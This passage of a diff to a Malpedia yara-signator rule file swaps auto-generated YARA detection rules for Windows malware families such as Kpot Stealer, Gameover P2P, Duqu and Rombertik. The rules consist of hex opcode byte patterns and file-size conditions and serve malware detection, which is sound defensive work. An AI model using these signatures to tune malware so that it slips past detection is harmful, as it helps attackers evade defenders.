+		$sequence_6 = { 57 8d45f0 8bd9 50 6860ea0000 33f6 895de4 }
+		$sequence_7 = { 0f8408010000 33f6 8bcb 894df4 663bf2 0f83f8000000 57 }
+		$sequence_8 = { 6683f802 750b 8b4c2408 e8???????? eb10 0fb6c1 50 }
+		$sequence_9 = { 89b544ffffff 89b564ffffff 89b568ffffff 89b56cffffff 89b570ffffff 89b57cffffff }
 
 	condition:
-		7 of them and filesize < 1515520
+		7 of them and filesize < 114688
 }
-rule MALPEDIA_Win_Kins_Auto : FILE
+rule MALPEDIA_Win_Oni_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "743f9274-41e4-5665-bc30-911487d51855"
+		id = "de723d64-30bf-5667-a979-f8186ef8b8cb"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kins"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kins_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oni"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.oni_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "26d261757c4f136c791aeb2f4de3cf368918a3d762b525e91ab2a0dc9fc542ca"
+		logic_hash = "e7a58256b76e741c7c3e2e9d7af61ce1190ab07a3a92bb457114a7c15de62838"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -141653,32 +141418,32 @@ rule MALPEDIA_Win_Kins_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5f 5e 5b c9 c3 ff0d???????? 7518 }
-		$sequence_1 = { e8???????? 6a2e 8d7b18 57 e8???????? 84c0 743e }
-		$sequence_2 = { 8b4d0c 890491 42 33c0 85f6 75c2 8b4510 }
-		$sequence_3 = { 33da 035dec 897dfc 8d84032211906b c1c007 03c7 8bfe }
-		$sequence_4 = { 89441904 33c0 eb03 33c0 40 5f }
-		$sequence_5 = { e8???????? 8bf0 85f6 0f8512010000 8d45dc 8bd8 e8???????? }
-		$sequence_6 = { e8???????? 33ff 85ff 7526 837c242800 0f85cefeffff 8b7508 }
-		$sequence_7 = { 56 ffd7 833d????????04 720a 56 }
-		$sequence_8 = { 7510 837de801 750a 8b4720 894714 c645ff01 8a45ff }
-		$sequence_9 = { 72f0 8d411c e8???????? 83611800 }
+		$sequence_0 = { 8d8c24f0000000 c78424040100000f000000 c784240001000000000000 c68424f000000000 }
+		$sequence_1 = { 83f904 0f828d000000 83f923 0f8789000000 8bc8 }
+		$sequence_2 = { 8b4804 8d41f8 89840d14ffffff 8d4580 50 c74580b83a4300 e8???????? }
+		$sequence_3 = { 7603 6a26 58 0fb60c8536bf4200 0fb6348537bf4200 8bf9 8985b4f8ffff }
+		$sequence_4 = { 7420 6bc618 57 8db86c854300 57 ff15???????? }
+		$sequence_5 = { 8bc1 83e13f c1f806 6bc930 8b048590884300 f644082801 7406 }
+		$sequence_6 = { 83e03f c1ff06 6bd830 8b04bd90884300 f644032801 7444 837c0318ff }
+		$sequence_7 = { 8b550c 3b5df0 0f82cefeffff eb20 8b0c8d90884300 }
+		$sequence_8 = { 8d85f8fdffff 6a00 50 e8???????? 83c40c 8d85f8feffff }
+		$sequence_9 = { eb02 33f6 53 8d4dd0 e8???????? 807dd400 750a }
 
 	condition:
-		7 of them and filesize < 548864
+		7 of them and filesize < 499712
 }
-rule MALPEDIA_Win_Kpot_Stealer_Auto : FILE
+rule MALPEDIA_Win_Gameover_P2P_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2d1c2c52-a27f-577a-ba10-9c57d7ba8b38"
+		id = "fe20a97c-206c-5c98-87a9-4b574fa239f7"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kpot_stealer_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gameover_p2p_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "c16845199544fc6722c4e2fc31a24b6089435ba431e0486f2fdbb3a3dff70b56"
+		logic_hash = "0a805dc64b5619969bf73a86439d36461e7cd7fd50eef8d82014a2fb996a9dce"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -141692,32 +141457,32 @@ rule MALPEDIA_Win_Kpot_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0bce 0fb67007 0fb64006 c1e608 }
-		$sequence_1 = { 8b4608 8b0e ff3481 ff15???????? 8b4608 8b4e04 }
-		$sequence_2 = { d1e8 8bc8 81e100000007 8bd8 }
-		$sequence_3 = { 8a02 3c2d 7506 33ff 47 42 eb07 }
-		$sequence_4 = { 59 8d4df8 51 ff75f8 }
-		$sequence_5 = { 57 8bf8 8b4518 0fb67005 }
-		$sequence_6 = { 0bd1 8bcf c1e11b d1ef }
-		$sequence_7 = { 8bd6 e8???????? c6043700 8bc7 5f }
-		$sequence_8 = { 8a07 84c0 7417 8a0c3a 47 3ac8 74f2 }
-		$sequence_9 = { 53 56 57 8bf8 8b4518 0fb67005 }
+		$sequence_0 = { 88442413 0fb6c0 8944241c 8a80007f3902 0fb6c0 3bc8 }
+		$sequence_1 = { 8d55ee 33c9 e8???????? ba???????? 6a2e 58 668945ec }
+		$sequence_2 = { 33c0 e9???????? 6a74 59 e8???????? 8bf8 85ff }
+		$sequence_3 = { 8b8684000000 8d0440 03c0 0fb78c008a183902 03c0 898e80000000 0fb79088183902 }
+		$sequence_4 = { 895108 6bd20c 83c104 e8???????? c20400 f644240401 }
+		$sequence_5 = { 3d02010000 0f85e0000000 8d7dce 6800020000 8d44241c 50 8d8424b0060000 }
+		$sequence_6 = { e8???????? 33d2 b9ff000000 f7f1 6a00 56 8bcf }
+		$sequence_7 = { ff15???????? 8bf0 89742410 83feff 7478 8d442414 50 }
+		$sequence_8 = { 8a0408 3204f598613902 32c2 42 880439 663b14f59a613902 }
+		$sequence_9 = { 50 8d442448 85ed 8b6c2444 0f45c8 51 ff742430 }
 
 	condition:
-		7 of them and filesize < 219136
+		7 of them and filesize < 598016
 }
-rule MALPEDIA_Win_Sinowal_Auto : FILE
+rule MALPEDIA_Win_Scranos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1f893f7f-89f2-5c9f-9fc2-27e806579cce"
+		id = "e6b87374-5f91-5170-a53f-357b78008c92"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sinowal_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scranos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.scranos_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "54091d4d3127abdf4debf8514f31e0539d3fa9d766e80cf864467b06870782b4"
+		logic_hash = "52e1cc52ba176c72c7453bb67f5d2aeb347a2cda714eb2419f457836d51a180e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -141731,32 +141496,32 @@ rule MALPEDIA_Win_Sinowal_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 85c0 0f85b3000000 837df800 }
-		$sequence_1 = { c7854cfdffff28000000 83bd4cfdffff03 7305 e9???????? 8b8d4cfdffff }
-		$sequence_2 = { 8b45fc 83c001 8945fc 8b4d0c d1e9 394dfc }
-		$sequence_3 = { 33d2 7596 837de800 7417 8b4508 8b08 }
-		$sequence_4 = { 8995ecfeffff c785c4feffff00000000 c745fc00000000 c745f800000000 c685f0feffff00 68ff000000 6a00 }
-		$sequence_5 = { 50 e8???????? 83c40c c745fc01000000 c745f804010000 8d4df8 }
-		$sequence_6 = { 51 ff15???????? 33c0 eb03 83c8ff }
-		$sequence_7 = { 52 ff15???????? c745f400000000 eb09 8b45f4 }
-		$sequence_8 = { 7405 e9???????? 6830020000 6a00 }
-		$sequence_9 = { 8b4dfc 0fb611 33d0 8b45fc 8810 8b4dfc }
+		$sequence_0 = { e9???????? 8d4dd0 e9???????? 8d8d64ffffff e9???????? b8???????? e9???????? }
+		$sequence_1 = { c68424450e00002d 8db424460e0000 f6c102 7406 c6062b 83c601 f6c101 }
+		$sequence_2 = { c745a800000000 837d9c00 7508 8b45a0 8b08 894d9c 8b55f4 }
+		$sequence_3 = { e8???????? 83c404 85c0 0f8587050000 39442424 0f8570050000 8b8d940c0000 }
+		$sequence_4 = { c745b07c441010 e8???????? cc 6a44 b8???????? e8???????? 68???????? }
+		$sequence_5 = { 8d6803 e8???????? 83c40c 85c0 0f85c4000000 6a07 56 }
+		$sequence_6 = { 8b5518 8991e0010000 c745f800000000 eb09 8b45f8 83c001 8945f8 }
+		$sequence_7 = { c6405400 0fb64dff 85c9 7514 8b55e4 8b45ec 3b424c }
+		$sequence_8 = { 90 8d442410 50 6a00 55 56 e8???????? }
+		$sequence_9 = { c7414802000000 8b55e8 52 e8???????? 83c404 83c001 8945b0 }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 2859008
 }
-rule MALPEDIA_Win_Backconfig_Auto : FILE
+rule MALPEDIA_Win_Stealer_0X3401_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "18fd149c-ad9b-5433-8651-ac1dcd92de05"
+		id = "2ae48584-3f0a-5429-8e37-f6d8d22f0c81"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.backconfig"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.backconfig_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealer_0x3401"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.stealer_0x3401_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "dc29e43fa81d60d5f53e6f4d5e158937c417e8f12650929b20d71338a8cb5ead"
+		logic_hash = "d48e39ba989936cedf7a0bb5dfb1b2a5b1f5da933f4aa10a0b47e5b061091dba"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -141770,32 +141535,32 @@ rule MALPEDIA_Win_Backconfig_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { a1???????? 8b0d???????? 8b15???????? 8985f0feffff a1???????? 6a51 8985fcfeffff }
-		$sequence_1 = { e8???????? 8b4de4 83c40c 6bc930 8975e0 8db1682a4100 }
-		$sequence_2 = { 8a15???????? 8d8569ffffff 6a00 50 898d64ffffff 889568ffffff }
-		$sequence_3 = { c1f805 8d1485c0504100 8b0a 83e61f c1e606 03ce }
-		$sequence_4 = { 8bc3 c1f805 8d3c85c0504100 8bf3 83e61f c1e606 8b07 }
-		$sequence_5 = { 8b0d???????? 8b15???????? 8985f0feffff a1???????? 6a51 8985fcfeffff 898df4feffff }
-		$sequence_6 = { 8d8d2cfdffff 68???????? 51 e8???????? 83c414 68401f0000 }
-		$sequence_7 = { 6a00 50 898d64ffffff 889568ffffff e8???????? }
-		$sequence_8 = { 8bf1 83e61f 8d3c85c0504100 8b07 c1e606 f644300401 7436 }
-		$sequence_9 = { 8bec 8b4508 56 8d34c550224100 833e00 7513 }
+		$sequence_0 = { 83e03f 6bc830 8b0495c8710210 8b440818 83f8ff 7409 }
+		$sequence_1 = { c685d07dffff00 83f808 720d 40 50 ffb5487effff }
+		$sequence_2 = { 68???????? 8bd0 c645fc21 8d4d90 e8???????? }
+		$sequence_3 = { 8d45bc 837dd010 c745cc01000000 0f4345bc c6400100 8d8578ffffff 50 }
+		$sequence_4 = { 660fd645bc f30f7e05???????? 8945b4 a1???????? c78500ffffff3f3f3f00 c78523ffffff00000000 }
+		$sequence_5 = { 50 b9???????? c645fc19 e8???????? 8d4d90 }
+		$sequence_6 = { 735f 8bc6 8bfe 83e03f c1ff06 6bd830 8b04bdc8710210 }
+		$sequence_7 = { 7534 40 83f8fe 0f8798020000 3bc8 7310 ff7710 }
+		$sequence_8 = { 49 83c9fe 41 99 898cb558f0ffff 2bc2 }
+		$sequence_9 = { 0f95c0 8985a8feffff 3bf7 741f 6690 68???????? 8bcb }
 
 	condition:
-		7 of them and filesize < 217088
+		7 of them and filesize < 357376
 }
-rule MALPEDIA_Win_Karma_Auto : FILE
+rule MALPEDIA_Win_Webmonitor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "24be30a8-d096-5dc7-8e51-b42bf2a52649"
+		id = "4edd58bc-84aa-57fd-8483-88f5d1911dcf"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.karma"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.karma_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webmonitor_auto.yar#L1-L165"
 		license_url = "N/A"
-		logic_hash = "35cdf75103d6b4a50883eb5678dfe204820b04234b8d7ece3879561247948adf"
+		logic_hash = "f03f08c033bc99c38a9a7047c1ab4dd8b784015d4b2f1d48ed5a63b916e4918d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -141809,32 +141574,38 @@ rule MALPEDIA_Win_Karma_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a08 6a00 8944243c ffd6 50 ffd3 6a40 }
-		$sequence_1 = { 8b450c 751c 41 83f908 72f1 }
-		$sequence_2 = { 8b0d???????? 33c0 3801 740a }
-		$sequence_3 = { 8bf1 33d2 57 663916 7409 }
-		$sequence_4 = { 668901 8d5202 6685c0 75ef 8bcf ba???????? }
-		$sequence_5 = { 750e 6685db 0f8478040000 83c702 ebc8 33ff }
-		$sequence_6 = { c1c80e 33c7 8b7b14 8903 8d0437 c1c007 314324 }
-		$sequence_7 = { 8bf1 eb02 33f6 0fb74102 }
-		$sequence_8 = { 6685c0 7429 0fb7d0 6683fa5c 7410 }
-		$sequence_9 = { 66833c45f051400000 75f4 33d2 663915???????? 7415 660f1f840000000000 }
+		$sequence_0 = { 33c9 c1eb0a 41 0fb7c3 }
+		$sequence_1 = { 04f0 fd ff01 04f0 fd }
+		$sequence_2 = { 50 51 e8???????? 83c418 807c242000 }
+		$sequence_3 = { 0fb6c0 6a09 33f0 e8???????? }
+		$sequence_4 = { 2b49fc e9???????? 55 8bec f30f104508 ff750c }
+		$sequence_5 = { 0f4345d8 0fbe0408 03d8 e9???????? 03da 8a043b }
+		$sequence_6 = { 0080cd41009c d34100 e8???????? a3???????? 41 }
+		$sequence_7 = { 1b4300 38644400 44 8a4100 }
+		$sequence_8 = { 2503fd006c ff1e e00e 000e }
+		$sequence_9 = { 03c6 53 c1e008 6a0e 8945e0 e8???????? }
+		$sequence_10 = { 04c8 fe04fc fd 04f8 fd ff01 }
+		$sequence_11 = { 41 00baa4f34100 b9???????? ffe1 ba???????? b9???????? ffe1 }
+		$sequence_12 = { 04f8 fd 0512002413 000d???????? 04f4 }
+		$sequence_13 = { 33cd e8???????? c9 c3 68???????? e8???????? }
+		$sequence_14 = { 33c9 6800900100 668908 8bcf }
+		$sequence_15 = { 61 0043ec fe04ec fe05???????? 000d???????? 04c8 }
 
 	condition:
-		7 of them and filesize < 49208
+		7 of them and filesize < 1984512
 }
-rule MALPEDIA_Win_Resident_Auto : FILE
+rule MALPEDIA_Win_Screencap_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1b67466a-54db-5e85-b74e-0f6af48d989f"
+		id = "379c64a1-3968-5838-b405-32978ebeeb34"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.resident"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.resident_auto.yar#L1-L176"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.screencap"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.screencap_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "c657f6a8f6e1222a8318e6995666aff3bd59abbbd0dacc976a5ca7724d12794b"
+		logic_hash = "2175ebdcdf09489a5c3e9d1a0443dafe26fb70adb28f0b3b4f8cf2a642f56129"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -141848,38 +141619,32 @@ rule MALPEDIA_Win_Resident_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 8d95dcf9ffff 52 6a00 ff15???????? 85c0 }
-		$sequence_1 = { c1e606 03348500b94000 8b45f8 8b00 8906 8b45fc 8a00 }
-		$sequence_2 = { 894c243c 8b4c2460 89442404 89542440 8b54245c }
-		$sequence_3 = { 895c2410 c744240cffffffff 89742408 c744240400000000 }
-		$sequence_4 = { e8???????? 89c6 85c0 0f8427010000 c70424???????? 8d6c243e e8???????? }
-		$sequence_5 = { 8d85d8f9ffff e8???????? 8b95d4f9ffff 8bf0 03d2 8d45dc e8???????? }
-		$sequence_6 = { 750f 33c0 807dfa01 0f94c0 8d740010 eb41 83f803 }
-		$sequence_7 = { 8d55e4 52 ffd6 85c0 75e3 5b }
-		$sequence_8 = { 6689442430 668954242c 8b542422 b830000000 6689442428 66894c242e 0fb74c2420 }
-		$sequence_9 = { c744240800000000 c744240400000000 ff15???????? 83ec20 891c24 e8???????? }
-		$sequence_10 = { 8d34ad00000000 8b04a8 890424 e8???????? 83f825 76da }
-		$sequence_11 = { 8b37 89442418 8d460a 890424 e8???????? 89c3 85c0 }
-		$sequence_12 = { 75e4 b801000000 893c24 8944241c e8???????? }
-		$sequence_13 = { ff15???????? 6a04 8d55fc 52 6a06 }
-		$sequence_14 = { ff15???????? 83ec04 0fb7442446 66895c2450 }
-		$sequence_15 = { eb05 e8???????? 83c404 84c0 0f848e000000 }
+		$sequence_0 = { 750d 6800000080 6a06 ff15???????? }
+		$sequence_1 = { 488d0d1aba0000 e8???????? cc 488b4118 }
+		$sequence_2 = { 488d1557c90000 eb2b 488d153ec90000 eb22 }
+		$sequence_3 = { 488d156cd90000 488d8d90020000 4d8bc7 e8???????? 488d9580010000 488d4c2470 4533c9 }
+		$sequence_4 = { 48895c2408 57 4881ecb0000000 488d054cffffff 33db ba007f0000 33c9 }
+		$sequence_5 = { 4c8d442460 33d2 33c9 41d1e9 896c2428 4889742420 }
+		$sequence_6 = { eb4e 8d4306 39842420100000 7640 6a04 687c334700 55 }
+		$sequence_7 = { e9???????? 488d1554ca0000 e9???????? 498bd7 e9???????? 488d1570c60000 e9???????? }
+		$sequence_8 = { e9???????? 4c8bfb 4c8be3 488d055eeb0000 49c1fc05 4183e71f 4a8b0ce0 }
+		$sequence_9 = { 83c40c 8945a4 8975c8 897dcc 8975d0 8975d4 c645d800 }
 
 	condition:
-		7 of them and filesize < 125952
+		7 of them and filesize < 1391616
 }
-rule MALPEDIA_Win_Himan_Auto : FILE
+rule MALPEDIA_Win_Rombertik_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ed257a76-43f6-55c0-abc7-4725d6aa2228"
+		id = "fd5d6ec1-b599-5122-939f-30fe62c6e74a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.himan"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.himan_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rombertik"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rombertik_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "ca6405bd6a0987e5f551c0a2e97e9d04936f65f5adde6e64c734768ea5c267b3"
+		logic_hash = "1bd4f27874587acc7747c5d4ae5b510eeb7a9ee716658437468f5342433983ca"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -141893,32 +141658,32 @@ rule MALPEDIA_Win_Himan_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4608 57 57 57 50 }
-		$sequence_1 = { 33d5 8bee 81e5ff000000 c1ee08 3314adbcba6e00 8b28 }
-		$sequence_2 = { 8bf9 85c0 7505 e8???????? 8b442418 8b4c2414 }
-		$sequence_3 = { 8a83bc986e00 2bc8 8a11 eb02 32d2 8ac2 8aca }
-		$sequence_4 = { c1e604 0bce 7c0b 83f940 }
-		$sequence_5 = { ffd5 85c0 74d4 8b442438 85c0 74cc 03f0 }
-		$sequence_6 = { c1ee10 8bd7 81e6ff000000 c1ea08 8b2cb5bca16e00 81e2ff000000 }
-		$sequence_7 = { 8d4c2414 50 51 52 ff15???????? 85c0 7478 }
-		$sequence_8 = { 83c408 85c0 7451 8d8c24e0000000 68???????? 51 }
-		$sequence_9 = { f3ab 8d44241c 50 ff15???????? 8d4c2418 68???????? 51 }
+		$sequence_0 = { 68???????? 56 ff15???????? 85c0 7559 8b5e10 33ff }
+		$sequence_1 = { 40 49 75f9 8955f8 85d2 }
+		$sequence_2 = { 0f94c0 84c0 750d 47 3b7d0c 72c9 }
+		$sequence_3 = { 47 41 3bfb 72be 8b5df0 }
+		$sequence_4 = { 85c0 7426 8d95f8feffff 52 }
+		$sequence_5 = { 8d4de4 51 8955e8 8b55fc 6a00 52 }
+		$sequence_6 = { 8bec 81ec3c030000 53 56 57 bf00010000 }
+		$sequence_7 = { 8d8ddcfdffff 8bf0 51 56 }
+		$sequence_8 = { 68???????? 50 56 e8???????? 83c414 a3???????? }
+		$sequence_9 = { 81c900ffffff 41 8a9c0d00ffffff 889c0500ffffff }
 
 	condition:
-		7 of them and filesize < 139264
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Win_Shatteredglass_Auto : FILE
+rule MALPEDIA_Win_Chewbacca_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1439db5c-49a0-5968-b59a-03910a603b61"
+		id = "847304aa-d95d-5b53-bfb8-fe0eb8b688d2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shatteredglass"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shatteredglass_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chewbacca"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.chewbacca_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "f010e143a6683faf7af5372236553bb5fc1b43eebb2159b594f8f51e8251f8d5"
+		logic_hash = "f5f29df4947aa2192c20ef975dcc6c403a1b166aed455b80e47ce170d12533bf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -141932,32 +141697,32 @@ rule MALPEDIA_Win_Shatteredglass_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 03f0 83fe10 7ce1 83fe10 752f }
-		$sequence_1 = { 7ce1 83fe10 752f eb29 }
-		$sequence_2 = { 0f8ecf000000 8b531c 8bca 8d7102 }
-		$sequence_3 = { 6a00 b810000000 2bc6 50 8d8640d74100 50 57 }
-		$sequence_4 = { eb02 32d2 8bc6 c0e104 d1e8 02ca 83c602 }
-		$sequence_5 = { 8d4900 0fb70c77 8d41d0 6683f809 7705 }
-		$sequence_6 = { 7705 80e937 eb10 8d419f 6683f819 7705 }
-		$sequence_7 = { 53 ff15???????? 80bd33ffffff00 0f8452ffffff 57 e8???????? }
-		$sequence_8 = { 2bce d1f9 83f918 740a 68???????? e9???????? }
-		$sequence_9 = { 72f1 33c0 5d c3 8b04c58c434100 5d c3 }
+		$sequence_0 = { e8???????? b909000000 89ee 8b7c2430 f3a6 0f8558010000 89c6 }
+		$sequence_1 = { e8???????? c7442414c4796800 c7442410cd846800 c744240c1c070000 89442408 c7442404???????? a1???????? }
+		$sequence_2 = { 8b4324 85c0 7461 c744240c00000000 8d54242c 89542408 c744240400000000 }
+		$sequence_3 = { e9???????? 8b45fc e8???????? 52 50 8d45b8 e8???????? }
+		$sequence_4 = { e8???????? c744241cd4686500 c7442418a0836500 c74424147b110000 89442410 c744240c44446500 c7442408???????? }
+		$sequence_5 = { e8???????? c7042401000000 e8???????? e8???????? 89c3 e8???????? 895c2410 }
+		$sequence_6 = { e8???????? e8???????? 50 85c0 0f8540040000 b801000000 8d5584 }
+		$sequence_7 = { e8???????? c744241c84006700 c7442418b7026700 c7442414eb010000 89442410 c744240c64fd6600 c7442408???????? }
+		$sequence_8 = { e8???????? e8???????? 50 85c0 7516 8d55d4 89d8 }
+		$sequence_9 = { e8???????? c7442414cb246800 c7442410f3296800 c744240cec040000 89442408 c7442404???????? a1???????? }
 
 	condition:
-		7 of them and filesize < 273408
+		7 of them and filesize < 9764864
 }
-rule MALPEDIA_Win_Duqu_Auto : FILE
+rule MALPEDIA_Win_Tiop_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d021a3e0-a963-5c5a-8894-2a3900c75d82"
+		id = "7759473d-7c21-529d-8c5c-8c80ad3dfcde"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.duqu_auto.yar#L1-L169"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiop"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tiop_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "a5f03c1a39b5d865f59b6af67604227aa6b29a16f7ea254ca225f6a37485518b"
+		logic_hash = "9d95462dbb557911b61e12f852944c9e17315546dfa96a6eb7c9f227ec2b38c0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -141971,38 +141736,32 @@ rule MALPEDIA_Win_Duqu_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8d8df8fdffff 51 ff9088000000 8bd6 8bc8 }
-		$sequence_1 = { 5e 5b 8be5 5d c3 8b4718 ebf4 }
-		$sequence_2 = { ba78978b33 89869c000000 8bcb e8???????? ba5859004e }
-		$sequence_3 = { 744d 8b4c2414 8a442413 8b5c2418 85c9 7e30 0fb6c8 }
-		$sequence_4 = { 85c0 7465 e8???????? 85c0 }
-		$sequence_5 = { 56 51 8bf2 e8???????? }
-		$sequence_6 = { 8b5c242c 741a 40 83c704 8944241c 3b4218 }
-		$sequence_7 = { baec8ce154 8bcb e8???????? ba8eacac75 894628 }
-		$sequence_8 = { ba1225339c 89462c 8bcb e8???????? 89466c 85c0 }
-		$sequence_9 = { 8b4c2414 40 49 89442420 }
-		$sequence_10 = { 8bec 81ec0c020000 56 ff7508 8bf2 }
-		$sequence_11 = { 8bec 81ec04020000 53 8b5d08 56 57 6af0 }
-		$sequence_12 = { 8bec 81ec10080000 8365fc00 b800010000 }
-		$sequence_13 = { 8bec 53 56 8bd8 8d732c 57 8bce }
-		$sequence_14 = { 8bec 56 57 8b7d08 33f6 3b7d0c }
-		$sequence_15 = { 8bec 81ec0c020000 8365fc00 833d????????ff }
+		$sequence_0 = { ffd7 8d4c241c a3???????? e8???????? 8b10 53 8bc8 }
+		$sequence_1 = { 57 8965e8 8b4508 8d7004 8975e4 }
+		$sequence_2 = { 51 50 ffd7 83c408 85c0 7555 8b4604 }
+		$sequence_3 = { 64a100000000 50 64892500000000 83ec08 b8fc120000 e8???????? }
+		$sequence_4 = { 51 55 ff15???????? 8b7c2410 56 8b35???????? }
+		$sequence_5 = { 8d542414 68???????? f3ab 52 ffd3 83c414 85c0 }
+		$sequence_6 = { 68???????? 64a100000000 50 64892500000000 83ec08 56 33f6 }
